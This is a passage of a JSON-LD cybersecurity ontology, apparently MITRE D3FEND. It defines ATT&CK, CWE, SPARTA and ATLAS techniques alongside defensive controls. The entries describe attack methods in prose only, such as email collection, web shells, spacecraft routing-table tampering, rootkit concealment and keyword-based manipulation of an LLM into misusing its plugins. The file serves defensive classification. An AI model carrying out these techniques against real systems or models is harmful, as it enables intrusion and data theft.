      "d3f:definition": "Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include [Arp](https://attack.mitre.org/software/S0099), [ipconfig](https://attack.mitre.org/software/S0100)/[ifconfig](https://attack.mitre.org/software/S0101), [nbtstat](https://attack.mitre.org/software/S0102), and [route](https://attack.mitre.org/software/S0103).",
      "d3f:may-execute": {
        "@id": "d3f:ExecutableScript"
      },
      "d3f:may-invoke": [
        {
          "@id": "d3f:CreateProcess"
        },
        {
          "@id": "d3f:GetSystemNetworkConfigValue"
        }
      ],
      "rdfs:label": "System Network Configuration Discovery",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DiscoveryTechnique"
        },
        {
          "@id": "_:Nc15d5c95772b40b4953f587386067596"
        },
        {
          "@id": "_:N68c8656043fc44a8a1bfdaae1b507b00"
        },
        {
          "@id": "_:N6e1d8ae8d14142e4aba4d91f4423ca86"
        }
      ]
    },
    {
      "@id": "_:Nc15d5c95772b40b4953f587386067596",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-execute"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ExecutableScript"
      }
    },
    {
      "@id": "_:N68c8656043fc44a8a1bfdaae1b507b00",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-invoke"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:CreateProcess"
      }
    },
    {
      "@id": "_:N6e1d8ae8d14142e4aba4d91f4423ca86",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-invoke"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:GetSystemNetworkConfigValue"
      }
    },
    {
      "@id": "d3f:T1204.003",
      "@type": "owl:Class",
      "d3f:attack-id": "T1204.003",
      "d3f:definition": "Adversaries may rely on a user running a malicious image to facilitate execution. Amazon Web Services (AWS) Amazon Machine Images (AMIs), Google Cloud Platform (GCP) Images, and Azure Images as well as popular container runtimes such as Docker can be backdoored. Backdoored images may be uploaded to a public repository via [Upload Malware](https://attack.mitre.org/techniques/T1608/001), and users may then download and deploy an instance or container from the image without realizing the image is malicious, thus bypassing techniques that specifically achieve Initial Access. This can lead to the execution of malicious code, such as code that executes cryptocurrency mining, in the instance or container.(Citation: Summit Route Malicious AMIs)",
      "rdfs:label": "Malicious Image",
      "rdfs:subClassOf": {
        "@id": "d3f:T1204"
      }
    },
    {
      "@id": "d3f:disables",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x disables y: The technique or agent x makes an entity y unable to perform its actions or capabilities.",
      "rdfs:isDefinedBy": {
        "@id": "http://wordnet-rdf.princeton.edu/id/00513267-v"
      },
      "rdfs:label": "disables",
      "rdfs:subPropertyOf": [
        {
          "@id": "d3f:evicts"
        },
        {
          "@id": "d3f:may-disable"
        },
        {
          "@id": "d3f:modifies"
        }
      ]
    },
    {
      "@id": "d3f:T1114.002",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:accesses": {
        "@id": "d3f:MailServer"
      },
      "d3f:attack-id": "T1114.002",
      "d3f:definition": "Adversaries may target an Exchange server, Office 365, or Google Workspace to collect sensitive information. Adversaries may leverage a user's credentials and interact directly with the Exchange server to acquire information from within a network. Adversaries may also access externally facing Exchange services, Office 365, or Google Workspace to access email using credentials or access tokens. Tools such as [MailSniper](https://attack.mitre.org/software/S0413) can be used to automate searches for specific keywords.",
      "rdfs:label": "Remote Email Collection",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1114"
        },
        {
          "@id": "_:N2cc96fb8c59341efb181c27a7f348ced"
        }
      ]
    },
    {
      "@id": "_:N2cc96fb8c59341efb181c27a7f348ced",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:accesses"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:MailServer"
      }
    },
    {
      "@id": "d3f:CWE-439",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-439",
      "d3f:definition": "A's behavior or functionality changes with a new version of A, or a new environment, which is not known (or manageable) by B.",
      "d3f:synonym": "Functional change",
      "rdfs:label": "Behavioral Change in New Version or Environment",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-435"
      }
    },
    {
      "@id": "d3f:CCI-000058_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system provides the capability for users to directly initiate session lock mechanisms.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": {
        "@id": "d3f:AccountLocking"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-05-19T00:00:00"
      },
      "rdfs:label": "CCI-000058"
    },
    {
      "@id": "d3f:NetworkTimeServer",
      "@type": "owl:Class",
      "d3f:definition": "A network time server is a server computer that reads the actual time from a reference clock and distributes this information to its clients using a computer network. The time server may be a local network time server or an internet time server. The time server may also be a stand-alone hardware device. It can use NTP (RFC5905) or other protocols.",
      "rdfs:label": "Network Time Server",
      "rdfs:seeAlso": {
        "@id": "dbr:Time_server"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:Server"
      }
    },
    {
      "@id": "d3f:CWE-685",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-685",
      "d3f:definition": "The product calls a function, procedure, or routine, but the caller specifies too many arguments, or too few arguments, which may lead to undefined behavior and resultant weaknesses.",
      "rdfs:label": "Function Call With Incorrect Number of Arguments",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-628"
      }
    },
    {
      "@id": "d3f:T1092",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1092",
      "d3f:definition": "Adversaries can perform command and control between compromised hosts on potentially disconnected networks using removable media to transfer commands from system to system.(Citation: ESET Sednit USBStealer 2014) Both systems would need to be compromised, with the likelihood that an Internet-connected system was compromised first and the second through lateral movement by [Replication Through Removable Media](https://attack.mitre.org/techniques/T1091). Commands and files would be relayed from the disconnected system to the Internet-connected system to which the adversary has direct access.",
      "d3f:modifies": {
        "@id": "d3f:RemovableMediaDevice"
      },
      "rdfs:label": "Communication Through Removable Media",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CommandAndControlTechnique"
        },
        {
          "@id": "_:N506089399fbc403283e80400a6a953a2"
        }
      ]
    },
    {
      "@id": "_:N506089399fbc403283e80400a6a953a2",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:RemovableMediaDevice"
      }
    },
    {
      "@id": "d3f:may-be-created-by",
      "@type": "owl:ObjectProperty",
      "owl:inverseOf": {
        "@id": "d3f:may-create"
      },
      "rdfs:label": "may-be-created-by",
      "rdfs:subPropertyOf": {
        "@id": "d3f:may-be-associated-with"
      }
    },
    {
      "@id": "d3f:PhysicalKeyLock",
      "@type": "owl:Class",
      "d3f:definition": "A mechanical locking device for securing moveable portions of physical barriers (e.g., doors, gates, drawers) in a secured position.",
      "d3f:synonym": "keyed lock",
      "rdfs:isDefinedBy": "NRC Regulatory Guide 5.12 Rev1",
      "rdfs:label": "Physical Key Lock",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:PhysicalLock"
        },
        {
          "@id": "_:N207daccbe29249c19582c7818c7dc1bc"
        }
      ]
    },
    {
      "@id": "_:N207daccbe29249c19582c7818c7dc1bc",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:uses"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:PhysicalKey"
      }
    },
    {
      "@id": "d3f:CWE-1118",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1118",
      "d3f:definition": "The documentation does not sufficiently describe the techniques that are used for error handling, exception processing, or similar mechanisms.",
      "rdfs:label": "Insufficient Documentation of Error Handling Techniques",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-1059"
      }
    },
    {
      "@id": "d3f:T1128",
      "@type": "owl:Class",
      "d3f:attack-id": "T1128",
      "d3f:definition": "Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system. It contains functionality to add helper DLLs for extending functionality of the utility. (Citation: TechNet Netsh) The paths to registered netsh.exe helper DLLs are entered into the Windows Registry at <code>HKLM\\SOFTWARE\\Microsoft\\Netsh</code>.",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1546.007",
      "rdfs:label": "Netsh Helper DLL",
      "rdfs:seeAlso": {
        "@id": "d3f:T1546.007"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:PersistenceTechnique"
      }
    },
    {
      "@id": "d3f:T0816",
      "@type": "owl:Class",
      "d3f:attack-id": "T0816",
      "d3f:definition": "Adversaries may forcibly restart or shutdown a device in an ICS environment to disrupt and potentially negatively impact physical processes. Methods of device restart and shutdown exist in some devices as built-in, standard functionalities. These functionalities can be executed using interactive device web interfaces, CLIs, and network protocol commands.",
      "rdfs:label": "Device Restart/Shutdown - ATTACK ICS",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKICSInhibitResponseFunctionTechnique"
      },
      "skos:prefLabel": "Device Restart/Shutdown"
    },
    {
      "@id": "d3f:OTReadCommandEvent",
      "@type": "owl:Class",
      "d3f:definition": "Read or retrieve data.",
      "rdfs:label": "OT Read Command Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:OTProcessDataCommandEvent"
        },
        {
          "@id": "_:Ned949f8cd2594c308c45bd34d956ba97"
        }
      ]
    },
    {
      "@id": "_:Ned949f8cd2594c308c45bd34d956ba97",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-participant"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OTReadCommand"
      }
    },
    {
      "@id": "d3f:EX-0012.02",
      "@type": "owl:Class",
      "d3f:attack-id": "EX-0012.02",
      "d3f:definition": "Threat actors may rewrite the maps that tell software where to send and receive things. In publish/subscribe or message-queued flight frameworks, tables map message IDs to subscribers, opcodes to handlers, and pipes to processes; at interfaces, address/port maps define how traffic traverses bridges and gateways (e.g., SpaceWire node/port routes, 1553 RT/subaddress mappings, CAN IDs). By altering these structures, commands can be misdelivered, dropped, duplicated, or routed through unintended paths; telemetry can be redirected or blackholed; and handler bindings can be swapped so an opcode triggers the wrong function. Schedule/routing hybrids, used to sequence activities and distribute results, can be edited to reorder execution or to create feedback loops that occupy bandwidth and processor time. The result is control over who hears what and when, achieved by changing the lookup tables that underpin command/telemetry distribution rather than the code that processes them.",
      "rdfs:label": "Internal Routing Tables - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/EX-0012/02/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:EX-0012"
      },
      "skos:prefLabel": "Internal Routing Tables"
    },
    {
      "@id": "d3f:Reference-SecureOneWayDataTransferUsingCommunicationInterfaceCircuitry",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patents.google.com/patent/US8068415B2"
      },
      "d3f:kb-abstract": "Network interface circuitry for a secure one-way data transfer from a sender's computer (“Send Node”) to a receiver's computer (“Receive Node”) over a data link, such as an optical fiber or shielded twisted pair copper wire communication cable, comprising send-only network interface circuitry for transmitting data from the Send Node to the data link, and receive-only network interface circuitry for receiving the data from the data link and transmitting the received data to the Receive Node, wherein the send-only network interface circuitry is configured not to receive any data from the data link, and the receive-only network interface circuitry is configured not to send any data to the data link. The network interface circuitry may use various interface means such as PCI interface, USB connection, FireWire connection, or serial port connection for coupling to the Send Node and the Receive Node.",
      "d3f:kb-organization": "OWL Computing Technologies Inc",
      "d3f:kb-reference-of": {
        "@id": "d3f:DirectionalNetworkLink"
      },
      "d3f:kb-reference-title": "Secure one-way data transfer using communication interface circuitry",
      "rdfs:label": "Reference - Secure one-way data transfer using communication interface circuitry"
    },
    {
      "@id": "d3f:CertificateTrustStore",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:contains": {
        "@id": "d3f:Certificate"
      },
      "d3f:definition": "A certificate truststore is used to store public certificates used to authenticate clients by the server for an SSL connection.",
      "rdfs:label": "Certificate Trust Store",
      "rdfs:seeAlso": [
        {
          "@id": "dbr:Public_key_certificate"
        },
        {
          "@id": "https://www.educative.io/edpresso/keystore-vs-truststore"
        }
      ],
      "rdfs:subClassOf": [
        {
          "@id": "d3f:TrustStore"
        },
        {
          "@id": "_:Nf9f67447e646454093965e54c579382f"
        }
      ]
    },
    {
      "@id": "_:Nf9f67447e646454093965e54c579382f",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:contains"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Certificate"
      }
    },
    {
      "@id": "d3f:NetworkTrafficPolicyMapping",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:NetworkTrafficPolicyMapping"
      ],
      "d3f:d3fend-id": "D3-NTPM",
      "d3f:definition": "Network traffic policy mapping identifies and models the allowed pathways of data at the network, transport, and/or application levels.",
      "d3f:kb-reference": {
        "@id": "d3f:Reference-CiscoASR9000AccessListCommands"
      },
      "d3f:maps": {
        "@id": "d3f:AccessControlConfiguration"
      },
      "d3f:queries": {
        "@id": "d3f:NetworkAgent"
      },
      "d3f:synonym": [
        "DLP Policy Mapping",
        "Firewall Mapping",
        "IPS Policy Mapping",
        "Web Security Gateway Policy Mapping"
      ],
      "rdfs:label": "Network Traffic Policy Mapping",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:NetworkMapping"
        },
        {
          "@id": "_:Nce944e56d953431ba0ec31dc2ddf8e4d"
        },
        {
          "@id": "_:Ncd9cbd217b3240448a592f45b77a340b"
        }
      ]
    },
    {
      "@id": "_:Nce944e56d953431ba0ec31dc2ddf8e4d",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:maps"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:AccessControlConfiguration"
      }
    },
    {
      "@id": "_:Ncd9cbd217b3240448a592f45b77a340b",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:queries"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:NetworkAgent"
      }
    },
    {
      "@id": "d3f:T1114",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:accesses": {
        "@id": "d3f:Resource"
      },
      "d3f:attack-id": "T1114",
      "d3f:definition": "Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.",
      "rdfs:label": "Email Collection",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CollectionTechnique"
        },
        {
          "@id": "_:Nb1ea3b2a7dae4e4e9686dd86e68dee7b"
        }
      ]
    },
    {
      "@id": "_:Nb1ea3b2a7dae4e4e9686dd86e68dee7b",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:accesses"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Resource"
      }
    },
    {
      "@id": "d3f:T1521.003",
      "@type": "owl:Class",
      "d3f:attack-id": "T1521.003",
      "d3f:definition": "Adversaries may use [SSL Pinning](https://attack.mitre.org/techniques/T1521/003)  to protect the C2 traffic from being intercepted and analyzed.",
      "rdfs:label": "SSL Pinning - ATTACK Mobile",
      "rdfs:subClassOf": {
        "@id": "d3f:T1521"
      },
      "skos:prefLabel": "SSL Pinning"
    },
    {
      "@id": "d3f:CWE-84",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-84",
      "d3f:definition": "The web application improperly neutralizes user-controlled input for executable script disguised with URI encodings.",
      "rdfs:label": "Improper Neutralization of Encoded URI Schemes in a Web Page",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-79"
      }
    },
    {
      "@id": "d3f:T1204",
      "@type": "owl:Class",
      "d3f:attack-id": "T1204",
      "d3f:definition": "An adversary may rely upon specific actions by a user in order to gain execution. Users may be subjected to social engineering to get them to execute malicious code by, for example, opening a malicious document file or link. These user actions will typically be observed as follow-on behavior from forms of [Phishing](https://attack.mitre.org/techniques/T1566).",
      "rdfs:label": "User Execution",
      "rdfs:subClassOf": {
        "@id": "d3f:ExecutionTechnique"
      }
    },
    {
      "@id": "d3f:GenerativeAdversarialNetwork",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-GAN",
      "d3f:definition": "Generative Adversarial Networks (GAN) are an approach to generative modeling using deep learning methods, such as convolutional neural networks.",
      "d3f:kb-article": "## References\nBrownlee, J. (2019). What Are Generative Adversarial Networks (GANs)? Machine Learning Mastery. [Link](https://machinelearningmastery.com/what-are-generative-adversarial-networks-gans/)",
      "d3f:synonym": "GAN",
      "rdfs:label": "Generative Adversarial Network",
      "rdfs:subClassOf": {
        "@id": "d3f:UnsupervisedLearning"
      }
    },
    {
      "@id": "d3f:EvalFunction",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "Takes inputs of strings and evaluations them as expressions.",
      "d3f:invokes": {
        "@id": "d3f:Subroutine"
      },
      "rdfs:label": "Eval Function",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:Subroutine"
        },
        {
          "@id": "_:N34ed6ec6842c4c038ba9e7ae4d6e4d73"
        }
      ]
    },
    {
      "@id": "_:N34ed6ec6842c4c038ba9e7ae4d6e4d73",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:invokes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Subroutine"
      }
    },
    {
      "@id": "d3f:LinuxPauseThread",
      "@type": "owl:Class",
      "d3f:definition": "Causes the calling thread to sleep until a signal is delivered that either terminates the thread or causes the invocation of a signal-catching function.",
      "rdfs:isDefinedBy": {
        "@id": "https://man7.org/linux/man-pages/man2/pause.2.html"
      },
      "rdfs:label": "Linux Pause Thread",
      "rdfs:subClassOf": {
        "@id": "d3f:OSAPISuspendThread"
      }
    },
    {
      "@id": "d3f:limits",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x limits y: The entity x specifies a designated limit beyond which some entity y cannot function or must be terminated.",
      "rdfs:isDefinedBy": {
        "@id": "http://wordnet-rdf.princeton.edu/id/13781154-n"
      },
      "rdfs:label": "limits",
      "rdfs:seeAlso": {
        "@id": "http://wordnet-rdf.princeton.edu/id/13780436-n"
      },
      "rdfs:subPropertyOf": {
        "@id": "d3f:restricts"
      },
      "skos:altLabel": "cutoff"
    },
    {
      "@id": "d3f:t-SNEClustering",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-TSC",
      "d3f:definition": "T-distributed Stochastic Neighbor Embedding (t-SNE) is a statistical method for visualizing high-dimensional data by giving each datapoint a location in a two or three-dimensional map.",
      "d3f:kb-article": "## References\nWikipedia. (n.d.). T-distributed stochastic neighbor embedding. [Link](https://en.wikipedia.org/wiki/T-distributed_stochastic_neighbor_embedding)",
      "rdfs:label": "t-SNE Clustering",
      "rdfs:subClassOf": {
        "@id": "d3f:Projection-basedClustering"
      }
    },
    {
      "@id": "d3f:EXF-0007",
      "@type": "owl:Class",
      "d3f:attack-id": "EXF-0007",
      "d3f:definition": "The adversary resides in mission ground infrastructure and uses its trusted position to siphon data at scale. With access to operator workstations, mission control servers, baseband/modem chains, telemetry processing pipelines, or archive databases, the attacker can mirror real-time streams, scrape recorder playbacks, export payload products, and harvest procedure logs and command histories. Because exfiltration rides normal paths, file staging areas, data distribution services, cloud relays, or cross-site links, it blends with routine dissemination. Compromise of scheduling tools and pass plans also lets the actor time captures to high-value downlinks and automate bulk extraction without touching the spacecraft.",
      "rdfs:label": "Compromised Ground System - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/EXF-0007/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:SPARTAExfiltrationTechnique"
      },
      "skos:prefLabel": "Compromised Ground System"
    },
    {
      "@id": "d3f:CWE-492",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-492",
      "d3f:definition": "Inner classes are translated into classes that are accessible at package scope and may expose code that the programmer intended to keep private to attackers.",
      "rdfs:label": "Use of Inner Class Containing Sensitive Data",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-668"
      }
    },
    {
      "@id": "d3f:T1100",
      "@type": "owl:Class",
      "d3f:attack-id": "T1100",
      "d3f:definition": "A Web shell is a Web script that is placed on an openly accessible Web server to allow an adversary to use the Web server as a gateway into a network. A Web shell may provide a set of functions to execute or a command-line interface on the system that hosts the Web server. In addition to a server-side script, a Web shell may have a client interface program that is used to talk to the Web server (see, for example, China Chopper Web shell client). (Citation: Lee 2013)",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1505.003",
      "rdfs:label": "Web Shell",
      "rdfs:seeAlso": {
        "@id": "d3f:T1505.003"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:PersistenceTechnique"
        },
        {
          "@id": "d3f:PrivilegeEscalationTechnique"
        }
      ]
    },
    {
      "@id": "d3f:CWE-1222",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1222",
      "d3f:definition": "The product defines a large address region protected from modification by the same register lock control bit. This results in a conflict between the functional requirement that some addresses need to be writable by software during operation and the security requirement that the system configuration lock bit must be set during the boot process.",
      "rdfs:label": "Insufficient Granularity of Address Regions Protected by Register Locks",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-1220"
      }
    },
    {
      "@id": "d3f:AML.T0069.001",
      "@type": "owl:Class",
      "d3f:attack-id": "AML.T0069.001",
      "d3f:definition": "Adversaries may discover keywords that have special meaning to the large language model (LLM), such as function names or object names. These can later be exploited to confuse or manipulate the LLM into misbehaving and to make calls to plugins the LLM has access to.",
      "rdfs:label": "System Instruction Keywords - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/techniques/AML.T0069.001"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:AML.T0069"
      },
      "skos:prefLabel": "System Instruction Keywords"
    },
    {
      "@id": "d3f:ContainerProcess",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A running instance of a container image.",
      "rdfs:label": "Container Process",
      "rdfs:seeAlso": [
        {
          "@id": "d3f:ContainerImage"
        },
        {
          "@id": "https://schema.ocsf.io/objects/container"
        }
      ],
      "rdfs:subClassOf": {
        "@id": "d3f:ApplicationProcess"
      }
    },
    {
      "@id": "d3f:ProductDeveloper",
      "@type": "owl:Class",
      "d3f:definition": "A product developer intentionally designs, creates, or improves products, which may include physical goods, software, or other outputs.",
      "rdfs:label": "Product Developer",
      "rdfs:subClassOf": {
        "@id": "d3f:Provider"
      }
    },
    {
      "@id": "d3f:NIST_SP_800-53_R5_SA-11_8",
      "@type": [
        "owl:NamedIndividual",
        "d3f:NISTControl"
      ],
      "d3f:control-name": "Developer Testing and Evaluation | Dynamic Code Analysis",
      "d3f:member-of": {
        "@id": "d3f:NIST_SP_800-53_R5"
      },
      "d3f:related": {
        "@id": "d3f:ApplicationHardening"
      },
      "rdfs:label": "SA-11(8)"
    },
    {
      "@id": "d3f:CWE-501",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-501",
      "d3f:definition": "The product mixes trusted and untrusted data in the same data structure or structured message.",
      "rdfs:label": "Trust Boundary Violation",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-664"
      }
    },
    {
      "@id": "d3f:T1104",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1104",
      "d3f:definition": "Adversaries may create multiple stages for command and control that are employed under different conditions or for certain functions. Use of multiple stages may obfuscate the command and control channel to make detection more difficult.",
      "d3f:produces": {
        "@id": "d3f:OutboundInternetNetworkTraffic"
      },
      "rdfs:label": "Multi-Stage Channels",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CommandAndControlTechnique"
        },
        {
          "@id": "_:Nd7d4b94017c04168bf934d348c16e81d"
        }
      ]
    },
    {
      "@id": "_:Nd7d4b94017c04168bf934d348c16e81d",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:produces"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OutboundInternetNetworkTraffic"
      }
    },
    {
      "@id": "d3f:Reference-DataExecutionPrevention_Microsoft",
      "@type": [
        "owl:NamedIndividual",
        "d3f:UserManualReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://docs.microsoft.com/en-us/windows/security/threat-protection/overview-of-threat-mitigations-in-windows-10#data-execution-prevention"
      },
      "d3f:kb-abstract": "Malware depends on its ability to insert a malicious payload into memory with the hope that it will be executed later. Wouldn't it be great if you could prevent malware from running if it wrote to an area that has been allocated solely for the storage of information?\n\nData Execution Prevention (DEP) does exactly that, by substantially reducing the range of memory that malicious code can use for its benefit. DEP uses the No eXecute bit on modern CPUs to mark blocks of memory as read-only so that those blocks can't be used to execute malicious code that may be inserted by means of a vulnerability exploit.",
      "d3f:kb-author": "Nick Schonning, Daniel Simpson, Marty Hernandez Avedon, Trond B. Krokli, jreeds, jcaparas, Andres Mariano Gorzelany, Tina Burden, Thomas Raya, Justin Hall, justanotheranonymoususer, Liza Poggemeyer, Dani Halfin, imba-tjd (Authors for entire page)",
      "d3f:kb-mitre-analysis": "",
      "d3f:kb-organization": "Microsoft",
      "d3f:kb-reference-of": {
        "@id": "d3f:ProcessSegmentExecutionPrevention"
      },
      "d3f:kb-reference-title": "Mitigate threats by using Windows 10 security features: Data Execution Prevention",
      "rdfs:label": "Reference - Mitigate threats by using Windows 10 security features: Data Execution Prevention - Microsoft"
    },
    {
      "@id": "d3f:SSHConnectionOpenEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event indicating the successful establishment of an SSH connection between a client and a server, marking the initiation of a secure session.",
      "rdfs:label": "SSH Connection Open Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:NetworkConnectionOpenEvent"
        },
        {
          "@id": "d3f:SSHEvent"
        }
      ]
    },
    {
      "@id": "d3f:T1564.001",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1564.001",
      "d3f:definition": "Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches (<code>dir /a</code> for Windows and <code>ls -a</code> for Linux and macOS).",
      "d3f:modifies": {
        "@id": "d3f:FileSystemMetadata"
      },
      "rdfs:label": "Hidden Files and Directories",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1564"
        },
        {
          "@id": "_:N5efd1d6c9984475ba9268bf766c4f02a"
        }
      ]
    },
    {
      "@id": "_:N5efd1d6c9984475ba9268bf766c4f02a",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:FileSystemMetadata"
      }
    },
    {
      "@id": "d3f:DE-0007",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "DE-0007",
      "d3f:definition": "A rootkit hides malicious activity by interposing on reporting paths after the system has booted. In flight contexts this includes patching flight software APIs, kernel syscalls, message queues, and telemetry publishers so task lists, counters, health channels, and event severities are falsified before downlink. Command handlers can be hooked to suppress evidence of certain opcodes or sources; recorder catalogs and file listings can be rewritten on the fly; and housekeeping can be biased to show nominal temperatures, currents, or voltages while actions proceed. The defining feature is runtime concealment: the observability surfaces operators rely on are altered to present a curated, benign narrative.",
      "d3f:modifies": [
        {
          "@id": "d3f:BootSector"
        },
        {
          "@id": "d3f:Kernel"
        },
        {
          "@id": "d3f:KernelModule"
        },
        {
          "@id": "d3f:SystemFirmware"
        }
      ],
      "rdfs:label": "Evasion via Rootkit - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/DE-0007/"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:SPARTADefenseEvasionTechnique"
        },
        {
          "@id": "_:N4447fe2af868440ea9ce6d357d558baf"
        },
        {
          "@id": "_:Nd416736b673b46f3956685aab84898b0"
        },
        {
          "@id": "_:Nf8dbb5a9adc74e3cb9a29dfc05230661"
        },
        {
          "@id": "_:Nf8985da1e3f148e7814cb7deaff2ed99"
        }
      ],
      "skos:prefLabel": "Evasion via Rootkit"
    },
    {
      "@id": "_:N4447fe2af868440ea9ce6d357d558baf",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:BootSector"
      }
    },
    {
      "@id": "_:Nd416736b673b46f3956685aab84898b0",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Kernel"
      }
    },
    {
      "@id": "_:Nf8dbb5a9adc74e3cb9a29dfc05230661",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:KernelModule"
      }
    },
    {
      "@id": "_:Nf8985da1e3f148e7814cb7deaff2ed99",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:SystemFirmware"
      }
    },
    {
      "@id": "d3f:T1497",
      "@type": "owl:Class",
      "d3f:attack-id": "T1497",
